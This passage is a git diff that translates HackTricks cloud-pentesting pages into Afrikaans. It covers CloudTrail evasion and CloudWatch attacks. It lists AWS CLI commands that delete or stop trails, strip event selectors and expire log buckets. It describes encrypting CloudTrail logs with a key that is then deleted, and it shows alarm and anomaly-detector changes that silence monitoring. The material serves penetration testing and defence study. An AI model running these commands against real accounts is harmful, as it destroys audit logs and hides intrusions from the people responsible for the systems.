obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken. +Op hierdie manier kan 'n **aanvaller die ARN van die sleutel verkry sonder om enige log te aktiveer**. In die ARN kan die aanvaller die **AWS rekening ID en die naam** sien, dit is maklik om die HoneyToken se maatskappy rekening ID en name te ken, so op hierdie manier kan 'n aanvaller identifiseer of die token 'n HoneyToken is. 
![](<../../../../images/image (93).png>) > [!CAUTION] -> Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own... +> Let daarop dat alle openbare API's wat ontdek is dat hulle nie CloudTrail logs genereer nie, nou reggestel is, so dalk moet jy jou eie vind... > -> For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). +> Vir meer inligting, kyk na die [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). -### Accessing Third Infrastructure +### Toegang tot Derde Infrastruktuur -Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) **won’t use the AWS API**, so CloudTrail won’t be able to see this communication. +Sekere AWS-dienste sal **'n bietjie infrastruktuur** genereer soos **Databases** of **Kubernetes** klusters (EKS). 'n Gebruiker wat **direk met daardie dienste praat** (soos die Kubernetes API) **sal nie die AWS API gebruik nie**, so CloudTrail sal nie in staat wees om hierdie kommunikasie te sien nie. -Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without getting detected by Cloudtrail**. +Daarom kan 'n gebruiker met toegang tot EKS wat die URL van die EKS API ontdek het, 'n token plaaslik genereer en **direk met die API-diens praat sonder om deur Cloudtrail opgespoor te word**. 
-More info in: +Meer info in: {{#ref}} ../../aws-post-exploitation/aws-eks-post-exploitation.md {{#endref}} -### Modifying CloudTrail Config - -#### Delete trails +### Wysig CloudTrail Konfigurasie +#### Verwyder spore ```bash aws cloudtrail delete-trail --name [trail-name] ``` - -#### Stop trails - +#### Stop spore ```bash aws cloudtrail stop-logging --name [trail-name] ``` - -#### Disable multi-region logging - +#### Deaktiveer multi-region logging ```bash aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services ``` - -#### Disable Logging by Event Selectors - +#### Deaktiveer Logging deur Gebeurtenis Keuses ```bash # Leave only the ReadOnly selector aws cloudtrail put-event-selectors --trail-name --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region 
@@ -251,30 +236,27 @@ aws cloudtrail put-event-selectors --trail-name --event-selectors ' # Remove all selectors (stop Insights) aws cloudtrail put-event-selectors --trail-name --event-selectors '[]' --region ``` +In die eerste voorbeeld word 'n enkele gebeurtenis selektor as 'n JSON-array met 'n enkele objek voorsien. Die `"ReadWriteType": "ReadOnly"` dui aan dat die **gebeurtenis selektor slegs lees-slegs gebeurtenisse moet vasvang** (so CloudTrail insigte **sal nie skryf** gebeurtenisse nagaan nie). -In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example). - -You can customize the event selector based on your specific requirements. - -#### Logs deletion via S3 lifecycle policy +Jy kan die gebeurtenis selektor aanpas op grond van jou spesifieke vereistes. +#### Logs verwydering via S3 lewensiklusbeleid ```bash aws s3api put-bucket-lifecycle --bucket --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region ``` - ### Modifying Bucket Configuration -- Delete the S3 bucket -- Change bucket policy to deny any writes from the CloudTrail service -- Add lifecycle policy to S3 bucket to delete objects -- Disable the kms key used to encrypt the CloudTrail logs +- Verwyder die S3-bucket +- Verander die bucket-beleid om enige skrywe van die CloudTrail-diens te weier +- Voeg 'n lewensiklusbeleid by die S3-bucket om voorwerpe te verwyder +- Deaktiveer die kms-sleutel wat gebruik word om die CloudTrail-logboek te enkripteer ### Cloudtrail ransomware #### S3 ransomware -You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\ -This is basically a **S3-KMS ransomware** 
explained in: +Jy kan **'n asymmetriese sleutel genereer** en **CloudTrail die data met daardie sleutel enkripteer** en **die private sleutel verwyder** sodat die CloudTrail-inhoud nie herstel kan word nie.\ +Dit is basies **S3-KMS ransomware** wat verduidelik word in: {{#ref}} ../../aws-post-exploitation/aws-s3-post-exploitation.md @@ -282,7 +264,7 @@ This is basically a **S3-KMS ransomware** explained in: **KMS ransomware** -This is an easiest way to perform the previous attack with different permissions requirements: +Dit is 'n maklike manier om die vorige aanval met verskillende toestemmingsvereistes uit te voer: {{#ref}} ../../aws-post-exploitation/aws-kms-post-exploitation.md @@ -293,7 +275,3 @@ This is an easiest way to perform the previous attack with different permissions - [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md index 0c790b881..1cf6d2e2c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md 
@@ -4,143 +4,142 @@ ## CloudWatch -**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events providing a **unified view of AWS resources**, applications and services.\ -CloudWatch Log Event have a **size limitation of 256KB on each log line**.\ -It can set **high resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications. +**CloudWatch** **verskaf** monitering en operasionele **data** in die vorm van logs/metrieke/gebeurtenisse wat 'n **geĂŻntegreerde oorsig van AWS hulpbronne**, toepassings en dienste bied.\ +CloudWatch Log Gebeurtenis het 'n **grootte beperking van 256KB op elke loglyn**.\ +Dit kan **hoĂ« resolusie alarms** stel, **logs** en **metrieke** langs mekaar visualiseer, outomatiese aksies neem, probleme oplos, en insigte ontdek om toepassings te optimaliseer. -You can monitor for example logs from CloudTrail. Events that are monitored: +Jy kan byvoorbeeld logs van CloudTrail monitor. 
Gebeurtenisse wat gemonitor word: -- Changes to Security Groups and NACLs -- Starting, Stopping, rebooting and terminating EC2 instances -- Changes to Security Policies within IAM and S3 -- Failed login attempts to the AWS Management Console -- API calls that resulted in failed authorization -- Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) +- Veranderinge aan Sekuriteitsgroepe en NACLs +- Begin, Stop, herbegin en beĂ«indig EC2 instansies +- Veranderinge aan Sekuriteitsbeleide binne IAM en S3 +- Mislukte aanmeldpogings tot die AWS Bestuurskonsol +- API-oproepe wat gelei het tot mislukte outorisasie +- Filters om in cloudwatch te soek: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) -## Key concepts +## Sleutelkonsepte ### Namespaces -A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them. +'n Namespace is 'n houer vir CloudWatch metrieke. Dit help om metrieke te kategoriseer en te isoleer, wat dit makliker maak om dit te bestuur en te analiseer. -- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics. +- **Voorbeelde**: AWS/EC2 vir EC2-verwante metrieke, AWS/RDS vir RDS metrieke. -### Metrics +### Metrieke -Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations. +Metrieke is datapunten wat oor tyd versamel word en die prestasie of benutting van AWS hulpbronne verteenwoordig. Metrieke kan van AWS dienste, pasgemaakte toepassings, of derdeparty integrasies versamel word. -- **Example**: CPUUtilization, NetworkIn, DiskReadOps. 
+- **Voorbeeld**: CPUUtilization, NetworkIn, DiskReadOps. -### Dimensions +### Dimensies -Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes. +Dimensies is sleutel-waarde pare wat deel is van metrieke. Dit help om 'n metriek uniek te identifiseer en bied addisionele konteks, met 30 die maksimum aantal dimensies wat aan 'n metriek gekoppel kan word. Dimensies laat ook toe om metrieke te filter en te aggregeer op grond van spesifieke eienskappe. -- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone. +- **Voorbeeld**: Vir EC2 instansies kan dimensies InstanceId, InstanceType, en AvailabilityZone insluit. -### Statistics +### Statistieke -Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount. +Statistieke is wiskundige berekeninge wat op metriekdata uitgevoer word om dit oor tyd saam te vat. Algemene statistieke sluit Gemiddelde, Som, Minimum, Maksimum, en MonsterTelling in. -- **Example**: Calculating the average CPU utilization over a period of one hour. +- **Voorbeeld**: Die gemiddelde CPU benutting oor 'n tydperk van een uur bereken. -### Units +### Eenhede -Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count. +Eenhede is die meting tipe wat aan 'n metriek gekoppel is. Eenhede help om konteks en betekenis aan die metriekdata te bied. Algemene eenhede sluit Persent, Bytes, Sekondes, Telling in. -- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes. 
+- **Voorbeeld**: CPUUtilization kan in Persent gemeet word, terwyl NetworkIn in Bytes gemeet kan word. -## CloudWatch Features +## CloudWatch Kenmerke ### Dashboard -**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. It is possible to create and configure dashboards to visualize data and monitor resources in a single view, combining different metrics from various AWS services. +**CloudWatch Dashboards** bied aanpasbare **uitsigte van jou AWS CloudWatch metrieke**. Dit is moontlik om dashboards te skep en te konfigureer om data te visualiseer en hulpbronne in 'n enkele uitsig te monitor, wat verskillende metrieke van verskeie AWS dienste kombineer. -**Key Features**: +**Sleutel Kenmerke**: -- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more. -- **Customization**: Layout and content can be customized to fit specific monitoring needs. +- **Widgets**: Boublokke van dashboards, insluitend grafieke, teks, alarms, en meer. +- **Aanpassing**: Uitsig en inhoud kan aangepas word om spesifieke monitering behoeftes te pas. -**Example Use Case**: +**Voorbeeld Gebruik Geval**: -- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets. +- 'n Enkele dashboard wat sleutelmetrieke vir jou hele AWS omgewing toon, insluitend EC2 instansies, RDS databasisse, en S3 emmers. -### Metric Stream and Metric Data +### Metriek Stroom en Metriek Data -**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice in near real-time. This is particularly useful for advanced monitoring, analytics, and custom dashboards using tools outside of AWS. +**Metriek Strome** in AWS CloudWatch stel jou in staat om CloudWatch metrieke voortdurend na 'n bestemming van jou keuse in byna regte tyd te stroom. 
Dit is veral nuttig vir gevorderde monitering, analise, en pasgemaakte dashboards wat gereedskap buite AWS gebruik. -**Metric Data** inside Metric Streams refers to the actual measurements or data points that are being streamed. These data points represent various metrics like CPU utilization, memory usage, etc., for AWS resources. +**Metriek Data** binne Metriek Strome verwys na die werklike metings of datapunten wat gestroom word. Hierdie datapunten verteenwoordig verskillende metrieke soos CPU benutting, geheue gebruik, ens., vir AWS hulpbronne. -**Example Use Case**: +**Voorbeeld Gebruik Geval**: -- Sending real-time metrics to a third-party monitoring service for advanced analysis. -- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance. +- Stuur regte tyd metrieke na 'n derdeparty moniteringsdiens vir gevorderde analise. +- Argiveer metrieke in 'n Amazon S3 emmer vir langtermyn berging en nakoming. ### Alarm -**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an auto-scaling policy, or running an AWS Lambda function. +**CloudWatch Alarms** monitor jou metrieke en voer aksies uit op grond van vooraf gedefinieerde drempels. Wanneer 'n metriek 'n drempel oorskry, kan die alarm een of meer aksies uitvoer soos om kennisgewings via SNS te stuur, 'n outo-skaal beleid te aktiveer, of 'n AWS Lambda funksie te laat loop. -**Key Components**: +**Sleutel Komponente**: -- **Threshold**: The value at which the alarm triggers. -- **Evaluation Periods**: The number of periods over which data is evaluated. -- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm -- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS). +- **Drempel**: Die waarde waarop die alarm geaktiveer word. 
+- **Evaluasie Tydperke**: Die aantal tydperke waaroor data geĂ«valueer word. +- **Datapunten om Alarm**: Die aantal tydperke met 'n bereikde drempel wat nodig is om die alarm te aktiveer. +- **Aksies**: Wat gebeur wanneer 'n alarmtoestand geaktiveer word (bv. kennisgewing via SNS). -**Example Use Case**: +**Voorbeeld Gebruik Geval**: -- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes. +- Monitering van EC2 instansie CPU benutting en 'n kennisgewing via SNS stuur as dit 80% vir 5 agtereenvolgende minute oorskry. -### Anomaly Detectors +### Anomalie Detektors -**Anomaly Detectors** use machine learning to automatically detect anomalies in your metrics. You can apply anomaly detection to any CloudWatch metric to identify deviations from normal patterns that might indicate issues. +**Anomalie Detektors** gebruik masjienleer om outomaties anomalieĂ« in jou metrieke te detecteer. Jy kan anomalie detectie op enige CloudWatch metriek toepas om afwykings van normale patrone te identifiseer wat probleme kan aandui. -**Key Components**: +**Sleutel Komponente**: -- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like. -- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric. +- **Model Opleiding**: CloudWatch gebruik historiese data om 'n model op te lei en te bepaal hoe normale gedrag lyk. +- **Anomalie Detectie Band**: 'n Visuele voorstelling van die verwagte reeks waardes vir 'n metriek. -**Example Use Case**: +**Voorbeeld Gebruik Geval**: -- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue. +- Die opsporing van ongewone CPU benutting patrone in 'n EC2 instansie wat 'n sekuriteitsbreuk of toepassingsprobleem kan aandui. 
-### Insight Rules and Managed Insight Rules +### Inzicht ReĂ«ls en Gemanagte Inzicht ReĂ«ls -**Insight Rules** allow you to identify trends, detect spikes, or other patterns of interest in your metric data using **powerful mathematical expressions** to define the conditions under which actions should be taken. These rules can help you identify anomalies or unusual behaviors in your resource performance and utilization. +**Inzicht ReĂ«ls** stel jou in staat om tendense te identifiseer, pieke te detecteer, of ander patrone van belang in jou metriekdata te identifiseer deur **kragtige wiskundige uitdrukkings** te gebruik om die toestande te definieer waaronder aksies geneem moet word. Hierdie reĂ«ls kan jou help om anomalieĂ« of ongewone gedrag in jou hulpbronprestasie en benutting te identifiseer. -**Managed Insight Rules** are pre-configured **insight rules provided by AWS**. They are designed to monitor specific AWS services or common use cases and can be enabled without needing detailed configuration. +**Gemanagte Inzicht ReĂ«ls** is vooraf-gekonfigureerde **inzicht reĂ«ls wat deur AWS verskaf word**. Hulle is ontwerp om spesifieke AWS dienste of algemene gebruiksgevalle te monitor en kan geaktiveer word sonder om gedetailleerde konfigurasie te benodig. -**Example Use Case**: +**Voorbeeld Gebruik Geval**: -- Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action. +- Monitering van RDS Prestasie: Aktiveer 'n gemanagte inzicht reĂ«l vir Amazon RDS wat sleutelprestasie-indikators soos CPU benutting, geheue gebruik, en skyf I/O monitor. As enige van hierdie metrieke veilige operasionele drempels oorskry, kan die reĂ«l 'n waarskuwing of outomatiese mitigasie aksie aktiveer. 
### CloudWatch Logs -Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported. +Laat toe om **logs van toepassings** en stelsels van **AWS dienste** (insluitend CloudTrail) en **van toepassings/stelsels** (**CloudWatch Agent** kan op 'n gasheer geĂŻnstalleer word) te **aggregeer en te monitor**. Logs kan **onbepaald gestoor** word (afhangende van die Log Groep instellings) en kan uitgevoer word. -**Elements**: +**Elemente**: -| **Log Group** | A **collection of log streams** that share the same retention, monitoring, and access control settings | +| **Log Groep** | 'n **versameling van log strome** wat dieselfde retensie, monitering, en toegangbeheer instellings deel | | ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | -| **Log Stream** | A sequence of **log events** that share the **same source** | -| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function | +| **Log Stroom** | 'n reeks van **log gebeurtenisse** wat die **dieselfde bron** deel | +| **Subskripsie Filters** | Definieer 'n **filterpatroon wat gebeurtenisse** in 'n spesifieke log groep pas, stuur dit na Kinesis Data Firehose stroom, Kinesis stroom, of 'n Lambda funksie | -### CloudWatch Monitoring & Events +### CloudWatch Monitering & Gebeurtenisse -CloudWatch **basic** aggregates data **every 5min** (the **detailed** one does that **every 1 min**). 
After the aggregation, it **checks the thresholds of the alarms** in case it needs to trigger one.\ -In that case, CLoudWatch can be prepared to send an event and perform some automatic actions (AWS lambda functions, SNS topics, SQS queues, Kinesis Streams) +CloudWatch **basies** aggregeer data **elke 5min** (die **gedetailleerde** een doen dit **elke 1 min**). Na die aggregasie, **kontroleer dit die drempels van die alarms** in geval dit een moet aktiveer.\ +In daardie geval kan CloudWatch voorberei wees om 'n gebeurtenis te stuur en sommige outomatiese aksies uit te voer (AWS lambda funksies, SNS onderwerpe, SQS rye, Kinesis Strome) -### Agent Installation +### Agent Installasie -You can install agents inside your machines/containers to automatically send the logs back to CloudWatch. +Jy kan agente binne jou masjiene/tenks installeer om outomaties die logs terug na CloudWatch te stuur. -- **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) -- **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). 
You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage -- **Configure** and **start** the CloudWatch Agent +- **Skep** 'n **rol** en **heg** dit aan die **instansie** met toestemmings wat CloudWatch toelaat om data van die instansies te versamel benewens om met AWS stelsels bestuurder SSM te kommunikeer (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) +- **Laai** en **installeer** die **agent** op die EC2 instansie ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). Jy kan dit van binne die EC2 aflaai of dit outomaties installeer met AWS Stelsels Bestuurder deur die pakket AWS-ConfigureAWSPackage te kies. +- **Konfigureer** en **begin** die CloudWatch Agent -A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. - -## Enumeration +'n log groep het baie strome. 'n stroom het baie gebeurtenisse. En binne elke stroom is die gebeurtenisse gewaarborg om in volgorde te wees. +## Enumerasie ```bash # Dashboards # 
@@ -213,250 +212,217 @@ aws events describe-event-source --name aws events list-replays aws events list-api-destinations aws events list-event-buses ``` - ## Post-Exploitation / Bypass ### **`cloudwatch:DeleteAlarms`,`cloudwatch:PutMetricAlarm` , `cloudwatch:PutCompositeAlarm`** -An attacker with this permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents. - -In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker would be able to create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B, and composite alarm B also depends on composite alarm A. In this scenario, it is not possible to delete any composite alarm that is part of the cycle because there is always still a composite alarm that depends on that alarm that you want to delete. +'n Aanvaller met hierdie toestemmings kan 'n organisasie se monitering en waarskuwing infrastruktuur aansienlik ondermyn. Deur bestaande alarms te verwyder, kan 'n aanvaller noodsaaklike waarskuwings deaktiveer wat administrateurs in kennis stel van kritieke prestasieprobleme, sekuriteitsbreuke of operasionele mislukkings. Verder, deur metrieksalarms te skep of te wysig, kan die aanvaller ook administrateurs mislei met vals waarskuwings of wettige alarms stilmaak, wat effektief kwaadwillige aktiwiteite verberg en tydige reaksies op werklike voorvalle voorkom. 
+Boonop, met die **`cloudwatch:PutCompositeAlarm`** toestemming, sal 'n aanvaller in staat wees om 'n lus of siklus van saamgestelde alarms te skep, waar saamgestelde alarm A afhanklik is van saamgestelde alarm B, en saamgestelde alarm B ook afhanklik is van saamgestelde alarm A. In hierdie scenario is dit nie moontlik om enige saamgestelde alarm wat deel van die siklus is, te verwyder nie, omdat daar altyd steeds 'n saamgestelde alarm is wat afhanklik is van daardie alarm wat jy wil verwyder. ```bash aws cloudwatch put-metric-alarm --cli-input-json | --alarm-name --comparison-operator --evaluation-periods [--datapoints-to-alarm ] [--threshold ] [--alarm-description ] [--alarm-actions ] [--metric-name ] [--namespace ] [--statistic ] [--dimensions ] [--period ] aws cloudwatch delete-alarms --alarm-names aws cloudwatch put-composite-alarm --alarm-name --alarm-rule [--no-actions-enabled | --actions-enabled [--alarm-actions ] [--insufficient-data-actions ] [--ok-actions ] ] ``` +Die volgende voorbeeld toon hoe om 'n metriek alarm ondoeltreffend te maak: -The following example shows how to make a metric alarm ineffective: - -- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic. -- By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm. +- Hierdie metriek alarm monitor die gemiddelde CPU benutting van 'n spesifieke EC2 instance, evalueer die metriek elke 300 sekondes en vereis 6 evaluasieperiodes (30 minute in totaal). 
As die gemiddelde CPU benutting 60% oorskry vir ten minste 4 van hierdie periodes, sal die alarm geaktiveer word en 'n kennisgewing na die gespesifiseerde SNS onderwerp stuur. +- Deur die Drempel aan te pas om meer as 99% te wees, die Periode op 10 sekondes in te stel, die Evaluasieperiodes op 8640 (aangesien 8640 periodes van 10 sekondes gelyk is aan 1 dag), en die Datapunte na Alarm ook op 8640, sal dit nodig wees dat die CPU benutting oor 99% moet wees elke 10 sekondes deur die hele 24-uur periode om 'n alarm te aktiveer. {{#tabs }} {{#tab name="Original Metric Alarm" }} - ```json { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-01234567890123456" - } - ], - "AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"], - "ComparisonOperator": "GreaterThanThreshold", - "DatapointsToAlarm": 4, - "EvaluationPeriods": 6, - "Period": 300, - "Statistic": "Average", - "Threshold": 60, - "AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%", - "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-01234567890123456" +} +], +"AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"], +"ComparisonOperator": "GreaterThanThreshold", +"DatapointsToAlarm": 4, +"EvaluationPeriods": 6, +"Period": 300, +"Statistic": "Average", +"Threshold": 60, +"AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%", +"AlarmName": "EC2 instance i-01234567890123456 CPU Utilization" } ``` - {{#endtab }} -{{#tab name="Modified Metric Alarm" }} - +{{#tab name="Gewysigde Metriek Alarm" }} ```json { - "Namespace": "AWS/EC2", - "MetricName": "CPUUtilization", - "Dimensions": [ - { - "Name": "InstanceId", - "Value": "i-0645d6d414dadf9f8" - } - ], - "AlarmActions": [], - "ComparisonOperator": "GreaterThanThreshold", - "DatapointsToAlarm": 8640, - "EvaluationPeriods": 
8640, - "Period": 10, - "Statistic": "Average", - "Threshold": 99, - "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", - "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" +"Namespace": "AWS/EC2", +"MetricName": "CPUUtilization", +"Dimensions": [ +{ +"Name": "InstanceId", +"Value": "i-0645d6d414dadf9f8" +} +], +"AlarmActions": [], +"ComparisonOperator": "GreaterThanThreshold", +"DatapointsToAlarm": 8640, +"EvaluationPeriods": 8640, +"Period": 10, +"Statistic": "Average", +"Threshold": 99, +"AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold", +"AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization" } ``` - {{#endtab }} {{#endtabs }} -**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. +**PotensiĂ«le Impak**: Gebrek aan kennisgewings vir kritieke gebeurtenisse, potensiĂ«le onopgemerkte probleme, vals waarskuwings, onderdruk werklike waarskuwings en moontlik gemiste opsporings van werklike voorvalle. ### **`cloudwatch:DeleteAlarmActions`, `cloudwatch:EnableAlarmActions` , `cloudwatch:SetAlarmState`** -By deleting alarm actions, the attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering auto-scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behaviors, either by reactivating previously disabled actions or by modifying which actions are triggered, potentially causing confusion and misdirection in incident response. +Deur alarm aksies te verwyder, kan die aanvaller kritieke waarskuwings en geoutomatiseerde reaksies voorkom wanneer 'n alarmtoestand bereik word, soos om administrateurs te kennisgewing of om outo-skaalaktiwiteite te aktiveer. 
Onbehoorlike aktivering of heraktivering van alarm aksies kan ook lei tot onverwagte gedrag, hetsy deur voorheen gedeaktiveerde aksies te heraktiveer of deur te verander watter aksies geaktiveer word, wat moontlik verwarring en misleiding in voorvalreaksie kan veroorsaak. -In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures. - -- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration. +Boonop kan 'n aanvaller met die toestemming alarmtoestande manipuleer, in staat om vals alarms te skep om administrateurs te aflei en te verwarr, of om werklike alarms te stil om aanhoudende kwaadwillige aktiwiteite of kritieke stelselfoute te verberg. +- As jy **`SetAlarmState`** op 'n saamgestelde alarm gebruik, is dit nie gewaarborg dat die saamgestelde alarm na sy werklike toestand terugkeer nie. Dit keer terug na sy werklike toestand slegs wanneer enige van sy kinderalarms toestand verander. Dit word ook herbeoordeel as jy sy konfigurasie opdateer. ```bash aws cloudwatch disable-alarm-actions --alarm-names aws cloudwatch enable-alarm-actions --alarm-names aws cloudwatch set-alarm-state --alarm-name --state-value --state-reason [--state-reason-data ] ``` - -**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents. +**PotensiĂ«le Impak**: Gebrek aan kennisgewings vir kritieke gebeurtenisse, potensiĂ«le onopgemerkte probleme, vals waarskuwings, onderdruk werklike waarskuwings en moontlik gemiste opsporings van werklike voorvalle. 
### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`** -An attacker would be able to compromise the ability of detection and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; and by creating or modifying them, it would be able either to misconfigure or create false positives in order to distract or overwhelm the monitoring. - +'n Aanvaller sou in staat wees om die vermoĂ« om ongebruikelijke patrone of anomalieĂ« in metrieke data op te spoor en daarop te reageer, te kompromitteer. Deur bestaande anomaliedetektore te verwyder, kan 'n aanvaller kritieke waarskuwingmeganismes deaktiveer; en deur hulle te skep of te wysig, sou dit in staat wees om ofwel verkeerd te konfigureer of vals positiewe te skep om die monitering te aflei of te oorweldig. ```bash aws cloudwatch delete-anomaly-detector [--cli-input-json | --namespace --metric-name --dimensions --stat ] aws cloudwatch put-anomaly-detector [--cli-input-json | --namespace --metric-name --dimensions --stat --configuration --metric-characteristics ] ``` - -The following example shows how to make a metric anomaly detector ineffective. This metric anomaly detector monitors the average CPU utilization of a specific EC2 instance, and just by adding the “ExcludedTimeRanges” parameter with the desired time range, it would be enough to ensure that the anomaly detector does not analyze or alert on any relevant data during that period. +Die volgende voorbeeld toon hoe om 'n metrieke anomaliedetektor ondoeltreffend te maak. Hierdie metrieke anomaliedetektor monitor die gemiddelde CPU-gebruik van 'n spesifieke EC2-instantie, en net deur die “ExcludedTimeRanges” parameter met die gewenste tydsbereik by te voeg, sal dit genoeg wees om te verseker dat die anomaliedetektor nie enige relevante 